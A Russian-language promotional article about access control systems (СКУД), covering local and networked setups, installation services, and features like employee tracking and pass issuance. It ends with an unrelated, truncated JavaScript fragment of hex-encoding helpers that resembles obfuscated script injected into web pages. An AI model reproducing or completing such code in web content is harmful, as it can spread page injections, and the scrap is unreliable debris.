



Для чего используют системы контроля доступа СКУД? Они нужны для защиты от несанкционированного проникновения посторонних лиц на территорию. Кроме того, они пригодятся на случаи разграничения доступа сотрудников внутри компании. Что может выступать объектом контроля? Люди, транспорт.

### Какие работы выполняют специализированные предприятия?

- Монтаж системы;
- Выполнение пуско-наладочных работ, внедрение таких систем контроля управления доступом, как СКУД и СКД;
- Техобслуживание и ремонт в случае возникновения неких проблем.

Система контроля доступа может быть сетевой или автономной, радиоканальной или традиционно проводной. При ее активации может использоваться биометрия, может потребоваться введение PIN-кода или могут вставляться носимые карты или брелоки.

### Локальная система контроля доступа СКУД

Если использовать ее, можно ограничить доступ в конкретной точке. Так, например, при ее использовании можно добиться того, что никто не выйдет на улицу, пройдя по черной лестнице. Система отлична своей простотой в монтаже, эксплуатации, обслуживании и своей достаточно низкой ценой. Чтобы записать новый ключ, надо действовать через СКУД и никак иначе. Специалисты не разрабатывают проектную документацию перед прокладкой. Это не требуется.

### Сетевые системы контроля доступа

Как правило, их используют для охраны офисных зданий, промышленных предприятий, многофункциональных комплексов и центров. Руководители фирм ценят их по ряду причин, некоторые из которых надо перечислить в этой статье:

- Обеспечение доступа для сотрудников. Программирование;
- Контроль над временем нахождения на предприятии, контроль времени и соблюдения основ трудовой дисциплины;
- Быстрая выдача пропусков;
- Ведение архива сведений по одному человеку или группе;
- Выведение данных с точек доступов на монитор компьютера;
- В любую минуту можно подключиться к системе с целью отслеживания местонахождения любого сотрудника;
- Контроль точек доступа в режиме online;
- Выведение на монитор фотоснимка человека, проходящего через пост охраны;
- Дистанционное открытие ворот шлагбаумов, дверей при прохождении через пост охраны;
- Разблокировка в автоматическом режиме, когда срабатывает пожарная сигнализация;
- Совмещение с системами видеонаблюдения, охраны и безопасности.

Если сравнивать сетевую и локальную систему, то первая более сложная и при ее монтаже приходится разрабатывать проект. Чаще всего специалисты придумывают устройства для проходной для офиса или предприятия, для гостиницы, для государственного или учебного заведения. При выполнении работы проводят только по графику, который согласован с Заказчиком.

### Преимущества

- Ответы на вопросы когда, кто и где;
- Определение людей, которым разрешается входить/выходить автоматически;
- Ограничение доступа для владельца ключа по дате и времени;
- Ограничение доступа по ключу вследствие увольнения и т.д.

```
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o
```